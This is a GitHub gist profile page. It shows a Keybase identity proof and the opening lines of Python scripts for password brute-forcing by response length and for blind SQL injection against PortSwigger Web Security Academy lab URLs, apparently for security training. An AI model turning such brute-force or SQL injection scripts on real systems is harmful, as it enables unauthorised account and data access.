Skip to content

Instantly share code, notes, and snippets.

View geoffchisnall's full-sized avatar
💭
CHOOKITY POK!

Geoffrey Chisnall geoffchisnall

💭
CHOOKITY POK!
17 followers · 29 following
View GitHub Profile
@geoffchisnall
geoffchisnall / keybase.md
Created March 24, 2020 10:18

Keybase proof

I hereby claim:

  • I am geoffchisnall on github.
  • I am mooncakeza (https://keybase.io/mooncakeza) on keybase.
  • I have a public key ASBHBLNJcq-UtGC-E-djXbA0IG2HdtLfhHmpZUdjNq6VWgo

To claim this, I am signing this object:

@geoffchisnall
geoffchisnall / Password Brute-Force.txt
Last active December 12, 2021 15:57
Password Brute-Force
#!/usr/bin/python3
#Little bruteforce that checks the Content-Length for difference.
import requests
char_list = ["!","{","}","_","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","@","#","$","%","^","&",",",'(',')',"-",':',';','.']
password = ''
TARGET_URL = 'http://127.0.0.1:8080'
@geoffchisnall
geoffchisnall / sql_condition_response.txt
Last active November 3, 2022 14:00
Blind SQL injection with conditional responses
#!/usr/bin/python3
#https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
#Script to get the password length and then get the password.
import requests,string
url = 'https://0a7a006b04e00d86c087908900db009f.web-security-academy.net'
s = requests.Session()
r = s.get(url)
@geoffchisnall
geoffchisnall / sql_condition_error.txt
Last active November 3, 2022 14:19
#!/usr/bin/python3
#https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
#FInd the length of the password and bruteforce it.
import requests,string
url = 'https://0a23003f0404ba6dc15226a500cf0001.web-security-academy.net/'
s = requests.Session()
r = s.get(url)